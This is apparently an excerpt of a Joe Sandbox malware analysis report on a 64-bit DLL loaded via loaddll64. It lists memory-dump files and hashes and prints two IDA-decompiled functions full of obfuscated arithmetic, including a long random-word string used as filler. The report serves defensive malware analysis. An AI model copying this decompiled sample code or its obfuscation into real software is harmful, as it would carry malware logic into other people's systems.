                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID: d
                          • API String ID: 0-2564639436
                          • Opcode ID: b19b34ea825deaec7f67e3e56fdf8c6bf6a2b00dbacc86478291ffe791470b8c
                          • Instruction ID: 9435dd44eb2c7902906fb853b109b3d2d6d063403f5c1846f864ed66ba5a0447
                          • Opcode Fuzzy Hash: b19b34ea825deaec7f67e3e56fdf8c6bf6a2b00dbacc86478291ffe791470b8c
                          • Instruction Fuzzy Hash: 41227D32A19B8585EB14CF55F8407A97BA5FBAABC0F014536DA8D4B768DF3CE150EB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00007FF87FF88C090D70(signed int __edx, signed int __rax, void* __rcx, signed int __r8, long long __r9, void* __r11, signed char _a8, signed int _a16, long long _a24, long long _a32, intOrPtr _a40, intOrPtr _a48, signed int _a56) {
                          				signed char* _v80;
                          				long long _v88;
                          				void* _v96;
                          				long long _v104;
                          				signed int _v112;
                          				long long _v120;
                          				signed long long _v128;
                          				signed short _v134;
                          				signed char _t242;
                          				signed int _t253;
                          				signed int _t264;
                          				signed int _t274;
                          				signed short _t309;
                          				signed short _t353;
                          				signed int _t354;
                          				void* _t375;
                          				void* _t377;
                          				intOrPtr _t386;
                          				signed long long _t387;
                          				signed int _t393;
                          				signed long long _t394;
                          				signed long long _t396;
                          				signed long long _t398;
                          				signed long long _t399;
                          				signed long long _t403;
                          				intOrPtr _t406;
                          				signed long long _t411;
                          				intOrPtr _t414;
                          				signed long long _t419;
                          				signed char* _t422;
                          				long long _t427;
                          				intOrPtr _t431;
                          				intOrPtr _t434;
                          				signed long long _t436;
                          				signed long long _t438;
                          				signed long long _t439;
                          				signed long long _t450;
                          				intOrPtr* _t452;
                          				void* _t459;
                          				signed short* _t460;
                          				signed long long _t464;
                          				signed long long _t466;
                          				signed long long _t468;
                          				signed long long _t469;
                          				signed long long _t471;
                          				signed char* _t472;
                          				signed int _t474;
                          				signed long long _t475;
                          				void* _t477;
                          				signed long long _t479;
                          				intOrPtr _t482;
                          				signed long long _t484;
                          				signed long long _t486;
                          				void* _t488;
                          				long long _t490;
                          				signed long long _t492;
                          
                          				_a32 = __r9;
                          				_a24 = __r8;
                          				_a16 = __edx;
                          				_t460 = _t459 - 0x48;
                          				r11d =  *0x8c0b4148; // 0x0
                          				_t452 =  *0x8c0b4168 -  *0x8c0b41a0;
                          				_a8 =  *0x8c0b4124 & 0x000000ff | 0x00000040;
                          				_t242 = (_a56 & 0x000000ff) + 1;
                          				r8d = __edx & 0x000000ff;
                          				r15d = _t242 & 0x000000ff;
                          				r14d = _t242 & 0x000000ff;
                          				_a56 = _t242;
                          				_t475 = __r11 + __r11;
                          				r11d = r11d + 1;
                          				_t471 = r11d;
                          				_v112 = __r8;
                          				_v134 = r14w;
                          				 *0x8c0b4148 = r11d;
                          				r11d = r11d + 1;
                          				_t353 =  *(__r8 + _t471 * 4) & 0x0000ffff;
                          				 *_t460 = _t353;
                          				_v88 = _t452;
                          				_v120 = __rax;
                          				r10d =  *(__rax + __rcx) & 0x000000ff;
                          				_v128 =  *(__r8 + __rax * 4) ^ 0x000009e7;
                          				_t422 = __rcx - 1;
                          				_t472 =  &(_t422[_t471]);
                          				_v80 = _t472;
                          				_t427 = _a48 +  *0x8c0b4170;
                          				 *0x8c0b4148 = r11d;
                          				r8d = _t422[0xae] & 0x000000ff;
                          				asm("cdq");
                          				_t479 = _v128;
                          				_t253 =  *0x8c0b4134; // 0x0
                          				asm("cdq");
                          				_v96 = _t427;
                          				 *(__r8 + 0x14 + _t479 * 4) = _t253 %  *(__r8 + 0x14 + _t479 * 4);
                          				r8d =  *_t472 & 0x000000ff;
                          				_v104 = _t427;
                          				 *_t472 = _t253 /  *(__r8 + 0x14 + _t479 * 4) / __r8;
                          				asm("cdq");
                          				r9d = 0xffff;
                          				_t386 = _a40;
                          				 *0x8c0b4133 =  *0x8c0b4133 + 0x1a99 %  *0x8c0b4124;
                          				if ( *((intOrPtr*)(_t386 + 0x2368)) - 0xc < 0) goto 0x8c091113;
                          				_t436 =  *0xabf;
                          				if ( *((intOrPtr*)(_a32 + _t436 * 2)) - ( *0x8c0b4132 & 0x000000ff) <= 0) goto 0x8c09110d;
                          				if (r14w - ( *(_t386 + _t422) & 0x000000ff) < 0) goto 0x8c090f37;
                          				_t387 =  *0x8c0b41a0; // 0x0
                          				if (( *0x8c0b4123 & 0x000000ff) ==  *((intOrPtr*)(__r8 + _t387 * 4))) goto 0x8c0910ce;
                          				_t484 =  *(__r8 + r11d * 4) % r8d - 1;
                          				if ( *((intOrPtr*)(0x390 + _t486 * 8)) !=  *((intOrPtr*)(_v96 + _t484 * 4))) goto 0x8c0910ce;
                          				_t490 = _t488 + 0xb1f;
                          				_v96 = _t490;
                          				if (_t475 != _t490) goto 0x8c0910ce;
                          				 *(_t479 + _t422 - 1) = ( *0x8c0b4122 & 0x000000ff) / ( *(_t479 + _t422 - 1) & 0x000000ff);
                          				 *(__r8 + 0x20 + (_t486 + _t486 * 2) * 4) =  *(__r8 + 0x20 + (_t486 + _t486 * 2) * 4) ^ r13d;
                          				_t393 =  *0x8c0b41a0; // 0x0
                          				_t394 = _t393 - 1;
                          				 *0x8c0b41a0 = _t394;
                          				_t100 = _t436 - 0x15bf; // -5567
                          				_t309 = _t100;
                          				_v104 = _t427;
                          				r11d =  *(_a40 + _t394 * 4);
                          				_t264 = _a16 & 0x000000ff;
                          				_a8 = _t264;
                          				if (r11d - _t264 < 0) goto 0x8c091198;
                          				r10d =  *0x8c0b4148; // 0x0
                          				r12d = _a8;
                          				_t354 = _t353 & 0x0000ffff;
                          				asm("o16 nop [eax+eax]");
                          				_t474 = r10d;
                          				_t438 = r11d;
                          				r8d =  *(_t438 + _a32) & 0x000000ff;
                          				r8b = r8b -  *(_t474 + _t422);
                          				r8b = r8b + 0xd;
                          				 *(_t474 + _t422) = r8b;
                          				r9d = _t354;
                          				r10d =  *0x8c0b4148; // 0x0
                          				r10d = r10d + 1;
                          				 *0x8c0b4148 = r10d;
                          				if (_t354 != _t309) goto 0x8c0910a6;
                          				r12d = 0xbcf7;
                          				_t396 =  *0x8c0b4178; // 0x0
                          				r9d = r9d + 1;
                          				 *(_t396 + _t438 * 2 + 0x1a) =  *(_t396 + _t438 * 2 + 0x1a) | _t309 & 0x0000ffff ^ r11w ^  *__r8;
                          				r10d =  *0x8c0b4148; // 0x0
                          				_t464 = _t309;
                          				 *0x8c0b4194 =  *0x8c0b4194 ^ _t396 % _t464;
                          				if (r9d == _t309 - 1) goto 0x8c091050;
                          				r12d = _a16 & 0x000000ff;
                          				_v104 = _t427;
                          				r11d = r11d + 1;
                          				if (r11d - r12d >= 0) goto 0x8c091000;
                          				r14d = _v134 & 0x0000ffff;
                          				_t492 = _v96;
                          				_t482 = _a24;
                          				goto 0x8c091198;
                          				_t398 =  *_t452;
                          				_t439 =  *0x8c0b4170; // 0x0
                          				 *(0xaef + _t398 * 8) = _t439 & _t475;
                          				 *0x8c0b4124 =  *0x8c0b4124 |  *(_a40 + _t398 * 4);
                          				_t274 =  *0x8c0b4148; // 0x0
                          				 *((char*)(_t274 + 0x1e + _t474)) = 0xe8;
                          				goto 0x8c091198;
                          				r9d = 0xffff;
                          				_t399 =  *0x8c0b41a0; // 0x0
                          				r14w = r14w + r9w;
                          				 *_t460 = ( *_t460 & 0x0000ffff) + r9w;
                          				 *(_v120 + 0x10 + _t492 * 8) =  *(_a40 + _t399 * 4) |  *((intOrPtr*)(_v120 + 0x2820)) + 0x00001540;
                          				r8d =  *0x8c0b4124; // 0x0
                          				 *0x8c0b41a0 =  *0x8c0b41a0 - 1;
                          				r8d = r8d - 1;
                          				 *0x8c0b4124 = r8d;
                          				_t466 = r8d +  *0x8c0b41a8;
                          				 *0x8c0b414c =  *0x8c0b414c ^ _t492 + _t464 & _a8 & 0x000000ff;
                          				 *0x8c0b4134 =  *0x8c0b4134 ^ r14w & 0xffffffff;
                          				 *_t466 = (sil & 0xffffffff) -  *_t466;
                          				 *0x8c0b4124 =  *0x8c0b4124 + 1;
                          				_t403 = _v112;
                          				r9d = 0xc;
                          				if ( *((intOrPtr*)(0xabf + _t403 * 8)) - _t474 >= 0) goto 0x8c091260;
                          				_t153 = _t482 + 0x44; // 0x44
                          				_t477 = _t153 + 4;
                          				r9d = r9d + 1;
                          				r14w = r14w + 0xffff;
                          				 *(_t482 + 4 + _t403 * 4) =  *(_a48 + _t403 * 2) & 0x0000ffff;
                          				r8d =  *0x8c0b4120 & 0x0000ffff;
                          				 *((long long*)(0xabf + _t492 * 8)) = _t403 - 0x1419;
                          				r8d =  *_t422 & 0x000000ff;
                          				_t468 = (_t466 << 4) +  *0x8c0b4188;
                          				 *_t468 =  *_t468 * (_a56 & 0x000000ff);
                          				if (r9d -  *((intOrPtr*)(0xabf + _v112 * 8)) > 0) goto 0x8c0911e0;
                          				r11d = _a16 & 0x000000ff;
                          				r8d =  *_t422 & 0x000000ff;
                          				r10d = r11d;
                          				_t406 =  *0x8c0b4188; // 0x0
                          				if ( *((intOrPtr*)(_t406 + _t468 * 4)) - r11d > 0) goto 0x8c0912cb;
                          				if ( *0x8c0b41a0 - 0x69 <= 0) goto 0x8c0912cb;
                          				if (_t492 - 0x238 <= 0) goto 0x8c0912cb;
                          				_t375 =  *0x8c0b4168 -  *0x8c0b4158; // 0x0
                          				if (_t375 >= 0) goto 0x8c0912cb;
                          				r8b = r8b + 1;
                          				 *_t422 = r8b & 0xffffffff;
                          				 *(_v88 + ( *0x8c0b4168 +  *0x8c0b4168) * 8) =  *0x8c0b4168 +  *0x8c0b4168;
                          				 *(_v80 - 1) = r11b;
                          				goto 0x8c091386;
                          				if (( *(_t477 - 4) | _t484 + 0x00000001) !=  *((intOrPtr*)(_t482 + 0xff8))) goto 0x8c0912e6;
                          				_t377 =  *0x8c0b4130 - 0xab1; // 0x0
                          				if (_t377 <= 0) goto 0x8c09130e;
                          				_t411 =  *0x8c0b41a0; // 0x0
                          				if ( *((intOrPtr*)(_a40 + _t411 * 4)) ==  *((intOrPtr*)(0x268 +  *0x8c0b4124 * 8))) goto 0x8c091410;
                          				r9d =  *(_a40 + _t468 * 4);
                          				if (r9d - 0x13b4 >= 0) goto 0x8c091410;
                          				asm("cdq");
                          				 *0x8c0b4170 =  *0x8c0b4170 + 0x921 / r9d;
                          				_t414 =  *0x8c0b4128; // 0x0
                          				_t450 =  *0x8c0b4124;
                          				 *((intOrPtr*)(_t414 + _t450 * 4)) = 0;
                          				_t469 = _t477 - 0x1ad7 + ((_a56 & 0x000000ff) + 0x00000001 & 0x000000ff);
                          				 *0x00080260 = _t469;
                          				r8d = ( *_t460 & 0x0000ffff) + ( *(_t482 + 0xaa0) & 0x0000ffff) + (r11b & 0xffffffff) & 0x0000ffff;
                          				sil = sil + 1;
                          				 *0x8c0b4158 = 0x167a;
                          				_t431 = _a32;
                          				_t419 = _t450;
                          				 *0x8c0b4150 = _t419;
                          				 *(0x268 + _t469 * 8) =  *(0x268 + _t469 * 8) ^ 0x000007d8;
                          				sil = sil |  *0x8c0b41a0;
                          				sil = sil | 0x000000d8;
                          				sil = sil -  *(_t419 + _t431);
                          				 *(_t419 + _t431) = sil;
                          				goto 0x8c091428;
                          				_t434 =  *0x8c0b4140; // 0x0
                          				return ( *(_a48 + _t469 * 4) & 0x0000ffff) -  *((intOrPtr*)(_t434 + _t469 * 4));
                          			}



























































                          0x7ff88c090d70
                          0x7ff88c090d75
                          0x7ff88c090d7a
                          0x7ff88c090d8a
                          0x7ff88c090d8e
                          0x7ff88c090dab
                          0x7ff88c090db2
                          0x7ff88c090dc1
                          0x7ff88c090dc3
                          0x7ff88c090dc7
                          0x7ff88c090dce
                          0x7ff88c090dd9
                          0x7ff88c090de4
                          0x7ff88c090de7
                          0x7ff88c090dea
                          0x7ff88c090df2
                          0x7ff88c090df7
                          0x7ff88c090e01
                          0x7ff88c090e08
                          0x7ff88c090e0b
                          0x7ff88c090e15
                          0x7ff88c090e1e
                          0x7ff88c090e25
                          0x7ff88c090e31
                          0x7ff88c090e3d
                          0x7ff88c090e42
                          0x7ff88c090e4d
                          0x7ff88c090e53
                          0x7ff88c090e5f
                          0x7ff88c090e66
                          0x7ff88c090e71
                          0x7ff88c090e79
                          0x7ff88c090e7a
                          0x7ff88c090e82
                          0x7ff88c090e8b
                          0x7ff88c090e95
                          0x7ff88c090e9a
                          0x7ff88c090ea4
                          0x7ff88c090ead
                          0x7ff88c090ec1
                          0x7ff88c090ec9
                          0x7ff88c090eca
                          0x7ff88c090ed6
                          0x7ff88c090ede
                          0x7ff88c090eeb
                          0x7ff88c090ef1
                          0x7ff88c090f0c
                          0x7ff88c090f1d
                          0x7ff88c090f1f
                          0x7ff88c090f31
                          0x7ff88c090f3c
                          0x7ff88c090f4b
                          0x7ff88c090f51
                          0x7ff88c090f54
                          0x7ff88c090f5c
                          0x7ff88c090f75
                          0x7ff88c090f7e
                          0x7ff88c090f94
                          0x7ff88c090f9b
                          0x7ff88c090f9e
                          0x7ff88c090fa5
                          0x7ff88c090fa5
                          0x7ff88c090fb3
                          0x7ff88c090fb8
                          0x7ff88c090fbc
                          0x7ff88c090fc4
                          0x7ff88c090fce
                          0x7ff88c090fd4
                          0x7ff88c090fdb
                          0x7ff88c090ff3
                          0x7ff88c090ff5
                          0x7ff88c09100c
                          0x7ff88c09100f
                          0x7ff88c091015
                          0x7ff88c09101a
                          0x7ff88c09101e
                          0x7ff88c091022
                          0x7ff88c091026
                          0x7ff88c091029
                          0x7ff88c091030
                          0x7ff88c091033
                          0x7ff88c09103c
                          0x7ff88c09103e
                          0x7ff88c091050
                          0x7ff88c091057
                          0x7ff88c09106f
                          0x7ff88c091074
                          0x7ff88c09107b
                          0x7ff88c09108d
                          0x7ff88c091096
                          0x7ff88c091098
                          0x7ff88c0910a1
                          0x7ff88c0910a6
                          0x7ff88c0910ac
                          0x7ff88c0910b6
                          0x7ff88c0910bc
                          0x7ff88c0910c1
                          0x7ff88c0910c9
                          0x7ff88c0910ce
                          0x7ff88c0910d1
                          0x7ff88c0910db
                          0x7ff88c0910f1
                          0x7ff88c0910f7
                          0x7ff88c091103
                          0x7ff88c091108
                          0x7ff88c09110d
                          0x7ff88c091113
                          0x7ff88c091126
                          0x7ff88c09112a
                          0x7ff88c091143
                          0x7ff88c091148
                          0x7ff88c09114f
                          0x7ff88c091156
                          0x7ff88c091161
                          0x7ff88c09116f
                          0x7ff88c091178
                          0x7ff88c091182
                          0x7ff88c09118f
                          0x7ff88c091192
                          0x7ff88c091198
                          0x7ff88c09119d
                          0x7ff88c0911ab
                          0x7ff88c0911b9
                          0x7ff88c0911e4
                          0x7ff88c0911ec
                          0x7ff88c0911ef
                          0x7ff88c0911f3
                          0x7ff88c0911fa
                          0x7ff88c09121e
                          0x7ff88c091226
                          0x7ff88c09122e
                          0x7ff88c09123b
                          0x7ff88c091250
                          0x7ff88c091260
                          0x7ff88c091269
                          0x7ff88c09126d
                          0x7ff88c091270
                          0x7ff88c09127b
                          0x7ff88c091285
                          0x7ff88c09128e
                          0x7ff88c091297
                          0x7ff88c09129e
                          0x7ff88c0912a0
                          0x7ff88c0912a9
                          0x7ff88c0912ba
                          0x7ff88c0912c2
                          0x7ff88c0912c6
                          0x7ff88c0912d6
                          0x7ff88c0912dd
                          0x7ff88c0912e4
                          0x7ff88c0912e6
                          0x7ff88c091308
                          0x7ff88c091316
                          0x7ff88c091321
                          0x7ff88c09133f
                          0x7ff88c091346
                          0x7ff88c09134d
                          0x7ff88c091354
                          0x7ff88c09135b
                          0x7ff88c09137b
                          0x7ff88c09137e
                          0x7ff88c091397
                          0x7ff88c09139b
                          0x7ff88c0913a8
                          0x7ff88c0913b6
                          0x7ff88c0913be
                          0x7ff88c0913ca
                          0x7ff88c0913d1
                          0x7ff88c0913dd
                          0x7ff88c0913e7
                          0x7ff88c0913eb
                          0x7ff88c0913ef
                          0x7ff88c09140e
                          0x7ff88c091418
                          0x7ff88c091438

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID: }Ux;
                          • API String ID: 0-2223722972
                          • Opcode ID: 642c962a0b806545a7463cc6ba01dbab3d006ed2b32fc2925106f0bfd09a13b8
                          • Instruction ID: a18c84b4b33101982c1bdf006ad18ba5a355b68526984ab47f8dd5fe16551bde
                          • Opcode Fuzzy Hash: 642c962a0b806545a7463cc6ba01dbab3d006ed2b32fc2925106f0bfd09a13b8
                          • Instruction Fuzzy Hash: 2202D132A08AD185EB60CB65E8407797FA1FBAABC1F054532EA8D47769DF3CD650DB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 41%
                          			E00007FF87FF88C0898F0(void* __ecx, void* __rax, void* __rdx, signed int __r8, void* __r9, long long __r13) {
                          				void* __rbx;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t197;
                          				unsigned int _t241;
                          				signed int _t250;
                          				void* _t280;
                          				void* _t281;
                          				signed int _t294;
                          				intOrPtr _t297;
                          				void* _t304;
                          				signed long long _t315;
                          				signed long long _t319;
                          				signed long long _t321;
                          				signed long long _t329;
                          				void* _t333;
                          				intOrPtr _t334;
                          				void* _t335;
                          				void* _t336;
                          				void* _t337;
                          				signed long long _t341;
                          				intOrPtr* _t342;
                          				signed long long _t344;
                          				intOrPtr _t349;
                          				intOrPtr _t350;
                          				intOrPtr _t352;
                          				void* _t356;
                          				signed long long _t359;
                          
                          				r14d = __r9 + 0x1249;
                          				r9d =  *(_t337 + 0x118);
                          				 *((intOrPtr*)(_t337 + 0x80)) = __ecx + 0xffffd84e;
                          				r9d = r9d + 0xfd2;
                          				 *(_t337 + 0x88) = r14d;
                          				r10d = __rax - 0x27b2;
                          				 *(_t337 + 0xd0) = __rdx - 0x36e7;
                          				 *(_t337 + 0xe8) = r10d;
                          				r11d = __rdx - 0x114f;
                          				 *(_t337 + 0xe0) = r11d;
                          				 *(_t337 + 0xf8) = __rdx - 0x2ad;
                          				 *((intOrPtr*)(_t337 + 0xf0)) =  *((intOrPtr*)(_t337 + 0xf0)) + 0xc8c;
                          				 *(_t337 + 0x100) = __r8 - 0x27ae;
                          				 *(_t337 + 0x84) = __rax + 0x113b;
                          				if (r9d - __rdx - 0xf35 < 0) goto 0x8c089cf0;
                          				_t319 =  *((intOrPtr*)(_t337 + 0x110));
                          				if ( *((long long*)(_t319 + 0x258)) == 0) goto 0x8c089cd6;
                          				_t334 =  *((intOrPtr*)(_t319 + 0x118));
                          				r11d = 0;
                          				_t352 =  *((intOrPtr*)(_t319 + 0x30));
                          				r8d = 0x2598;
                          				 *(_t319 + 0x1e0) = 0x3189;
                          				_t336 = _t335 +  *((intOrPtr*)(_t319 + 0xc0));
                          				if ( *((intOrPtr*)(_t352 + 0x150)) + 0x1a3 - r8d <= 0) goto 0x8c089a49;
                          				asm("o16 nop [eax+eax]");
                          				r8d = r8d + 1;
                          				 *(_t319 + 0x198) =  *(_t319 + 0x198) + 0x2103 +  *((intOrPtr*)(_t319 + 0x188));
                          				if (r8d - __rdx < 0) goto 0x8c089a20;
                          				if ( *((intOrPtr*)(_t334 + 0xb4)) - r11d <= 0) goto 0x8c089c9b;
                          				asm("o16 nop [eax+eax]");
                          				 *(_t319 + 0xa0) =  *(_t319 + 0xa0) | 0x00006be2;
                          				 *(_t319 + 0x120) =  *(_t319 + 0x120) * 0xbdda0def;
                          				r11d = r11d +  *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x1a0)) + 0x130)) + 0xffffdc11;
                          				if (( *( *((intOrPtr*)(_t319 + 0x140)) + 0x1d0) ^ 0x00001b1e) == 0x1f2c) goto 0x8c089ad2;
                          				 *( *_t319 + 0x1f0) =  *( *_t319 + 0x1f0) ^ _t323 - 0x00003595;
                          				_t349 =  *((intOrPtr*)(_t319 + 0x1c0));
                          				r10d = r11d;
                          				r8d =  *( *((intOrPtr*)(_t319 + 0x1c8)) + 0x188);
                          				_t341 =  *((intOrPtr*)(_t349 + 0x150)) - 0x3595;
                          				 *(_t319 + 0x198) =  *(_t319 + 0x198) * _t341;
                          				 *((intOrPtr*)(_t319 + 0x28)) =  *((intOrPtr*)(_t319 + 0x28)) + _t349 + 0x18;
                          				r8d =  *( *((intOrPtr*)(_t319 + 0x140)) + 0x60);
                          				r8d = r8d ^ 0x0000329d;
                          				if (r8d -  *(_t333 + _t336 + 4) / (__r8 ^ 0x00002031) >= 0) goto 0x8c089c83;
                          				_t294 =  *(_t319 + 0x120);
                          				 *((intOrPtr*)(_t319 + 0xa8)) =  *((intOrPtr*)(_t319 + 0xa8)) + _t294;
                          				_t329 =  *(_t319 + 0x1e0);
                          				 *((long long*)(_t319 + 0x1f0)) = 0x259b;
                          				 *(_t319 + 0x120) = _t294 - 1;
                          				if ( *((intOrPtr*)(_t319 + 0x60)) - _t329 < 0) goto 0x8c089b9b;
                          				 *(_t319 + 0x198) = 0x37fd;
                          				_t350 =  *((intOrPtr*)(_t319 + 0x1c8));
                          				r11d = r11d + ( *(_t350 + 0x130) ^ 0x000023f5);
                          				 *(_t319 + 0x18) =  *(_t319 + 0x100) * 0x2103;
                          				_t297 =  *((intOrPtr*)(_t319 + 0x150));
                          				_t280 = _t297 - 0x27b2;
                          				if (_t280 <= 0) goto 0x8c089bd9;
                          				 *((intOrPtr*)(_t319 + 0x48)) =  *((intOrPtr*)(_t319 + 0x48)) + _t297 + 0xffffd84e;
                          				 *(_t319 + 0x1e0) = _t329 | "y but matter August platforms wavy periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard struck pigeon branches persuade stretch previous mute frail flank cone winner combination plane wander sack children traverse skip probability plays dagger midst throne whip final particles trick compassion selling replacement prospect even relay between quarter beg monks yell speedometer dam ";
                          				_t241 =  *(_t352 + _t336 + r8d * 2) & 0x0000ffff;
                          				r8d = _t241;
                          				r8d = r8d & 0x00000fff;
                          				r8d = r8d +  *((intOrPtr*)(_t333 + _t336));
                          				if (_t280 == 0) goto 0x8c089c64;
                          				if (_t280 == 0) goto 0x8c089c15;
                          				if (_t280 == 0) goto 0x8c089c0c;
                          				_t281 = (_t241 >> 0xc) - 0xffffffffffffffff - 7;
                          				if (_t281 != 0) goto 0x8c089c75;
                          				goto 0x8c089c6b;
                          				 *((long long*)(_t350 + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x140)) + 0x198));
                          				 *((long long*)( *((intOrPtr*)(_t319 + 0x140)) + 0x198)) =  *((long long*)( *((intOrPtr*)(_t319 + 0x140)) + 0x198)) - 1;
                          				 *((intOrPtr*)(_t319 + 0x90)) =  *((intOrPtr*)(_t319 + 0x90)) +  *((intOrPtr*)(_t319 + 0x30)) + 0x90;
                          				_t304 =  *_t319;
                          				 *(_t319 + 0x20) =  *(_t304 + 0x1b8) * 0x228c;
                          				goto 0x8c089c6b;
                          				_t342 = _t341 +  *((intOrPtr*)(_t319 + 0xc0));
                          				 *_t342 =  *_t342 + _t304;
                          				if (_t281 != 0) goto 0x8c089b60;
                          				 *(_t319 + 0x1e0) =  *(_t319 + 0x1e0) ^ 0x0000228c;
                          				if (r11d -  *((intOrPtr*)(_t334 + 0xb4)) < 0) goto 0x8c089a70;
                          				r8d = 0x343a;
                          				 *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x1c8)) + 0x1e0)) =  *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x1c8)) + 0x1e0)) + _t342 -  *_t319;
                          				if ( *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x40)) + 0x130)) == 0x10ee) goto 0x8c089cd6;
                          				 *(_t319 + 0x1e0) =  *(_t319 + 0x1e0) ^ ( *(_t319 + 0x110) | 0x00003595);
                          				 *((long long*)(_t319 + 0x248)) = _t319 + 0x160;
                          				goto 0x8c089f68;
                          				r8d = 0x2598;
                          				 *((long long*)(_t337 + 0xd8)) = __r13;
                          				_t359 =  *((intOrPtr*)(_t337 + 0x110));
                          				r12d =  *(_t359 + 0x188);
                          				r15d =  *(_t359 + 0x140);
                          				 *(_t359 + 0x120) =  *(_t359 + 0x120) - ( *(_t359 + 0x1f0) &  *(_t359 + 0x20));
                          				r15d = r15d & r10d;
                          				r15d = r15d *  *(_t359 + 0x1a0);
                          				r14d =  *(_t359 + 0x20);
                          				r11d = r10d;
                          				r11d = r11d | r8d;
                          				 *(_t337 + 0x100) =  *(_t337 + 0x100) -  *((intOrPtr*)(_t359 + 0x48));
                          				r11d = r11d & r12d;
                          				r8d =  *(_t337 + 0xf8);
                          				r8d = r8d -  *((intOrPtr*)(_t359 + 0x1e0));
                          				r12d = r12d |  *(_t337 + 0xe0);
                          				r9d =  *(_t337 + 0x100);
                          				r14d = r14d | 0x000038e9;
                          				 *(_t337 + 0x70) = r15d;
                          				 *(_t337 + 0x68) = r14d;
                          				 *(_t337 + 0x60) =  *(_t359 + 0x1b8) - r11d + r11d;
                          				 *(_t359 + 0xe8) =  *(_t359 + 0xe8) * _t319;
                          				_t197 =  *(_t337 + 0xd0);
                          				r10d = _t197;
                          				r12d = r12d + _t197;
                          				r10d = r10d | 0x000037e1;
                          				 *(_t337 + 0x58) = ( *(_t359 + 0x200) & __rax - 0x000003bc - r8d) * _t197;
                          				 *(_t337 + 0x50) = r12d - r10d;
                          				 *(_t337 + 0x48) =  *(_t359 + 0xc8) * _t197;
                          				 *(_t337 + 0x40) = r11d;
                          				 *(_t337 + 0x38) = r10d;
                          				 *(_t337 + 0x30) = r8d;
                          				_t344 = _t359;
                          				 *(_t337 + 0x28) = r12d;
                          				 *((intOrPtr*)(_t337 + 0x20)) =  *((intOrPtr*)(_t359 + 0x130)) -  *((intOrPtr*)(_t359 + 0x80));
                          				E00007FF87FF88C079BA0( *(_t359 + 0xe8) * _t319, _t319,  *(_t304 + 0x1b8) * 0x228c, _t344,  &((_t352 + _t336 + r8d * 2)[1]), _t356);
                          				r8d = 0x343a;
                          				r9d =  *(_t337 + 0xf8);
                          				_t321 =  *(_t359 + 0x1f8) * 0x00001f2c & _t344;
                          				r9d = r9d *  *(_t359 + 0x120);
                          				r12d =  *(_t359 + 0x1c0);
                          				_t250 =  *(_t337 + 0x118) + 0xfffffe29 +  *(_t359 + 0xd8) * 0x30d5;
                          				r15d = _t250;
                          				r14d =  *(_t359 + 0x1c8);
                          				r15d = r15d & 0x000030d5;
                          				_t315 =  *(_t359 + 0x1b8) * _t321;
                          				r9d = r9d ^ 0x00003666;
                          				 *(_t359 + 0x1b8) = _t315;
                          				r8d =  *(_t337 + 0xe8);
                          				r11d = _t321 + _t315;
                          				r10d = _t250;
                          				r10d = r10d ^ 0x000027b2;
                          				r10d = r10d *  *(_t359 + 0x1b0);
                          				r12d = r12d &  *(_t337 + 0x84);
                          				 *(_t337 + 0x60) = r15d;
                          				 *(_t337 + 0x58) = r9d;
                          				 *(_t337 + 0x50) = r12d * r8d;
                          				 *(_t337 + 0x48) =  *(_t359 + 0x188) - r8d +  *_t359;
                          				 *(_t337 + 0x40) =  *((intOrPtr*)(_t359 + 0x100)) -  *((intOrPtr*)(_t359 + 0x1d0)) + 0x329d;
                          				 *(_t337 + 0x38) = r11d;
                          				r8d = ( *((intOrPtr*)(_t337 + 0x80)) -  *((intOrPtr*)(_t359 + 0x70))) * 0x3666;
                          				 *(_t337 + 0x30) =  *((intOrPtr*)(_t337 + 0xf0)) + 0xffffda68 | r14d;
                          				 *(_t337 + 0x28) = r10d;
                          				 *((intOrPtr*)(_t337 + 0x20)) = r8d * 0x2103 -  *((intOrPtr*)(_t359 + 0xe0));
                          				E00007FF87FF88C087C20(_t323 - 0x3595 - _t323 - 1, _t321,  *(_t304 + 0x1b8) * 0x228c, _t334, _t344, _t359);
                          				return  *(_t337 + 0x88) + 0x927;
                          			}































                          0x7ff88c089909
                          0x7ff88c08991d
                          0x7ff88c089925
                          0x7ff88c08992c
                          0x7ff88c089939
                          0x7ff88c089941
                          0x7ff88c089948
                          0x7ff88c089955
                          0x7ff88c089964
                          0x7ff88c089971
                          0x7ff88c089979
                          0x7ff88c08998b
                          0x7ff88c089999
                          0x7ff88c0899a6
                          0x7ff88c0899b0
                          0x7ff88c0899b6
                          0x7ff88c0899c6
                          0x7ff88c0899cc
                          0x7ff88c0899d3
                          0x7ff88c0899d6
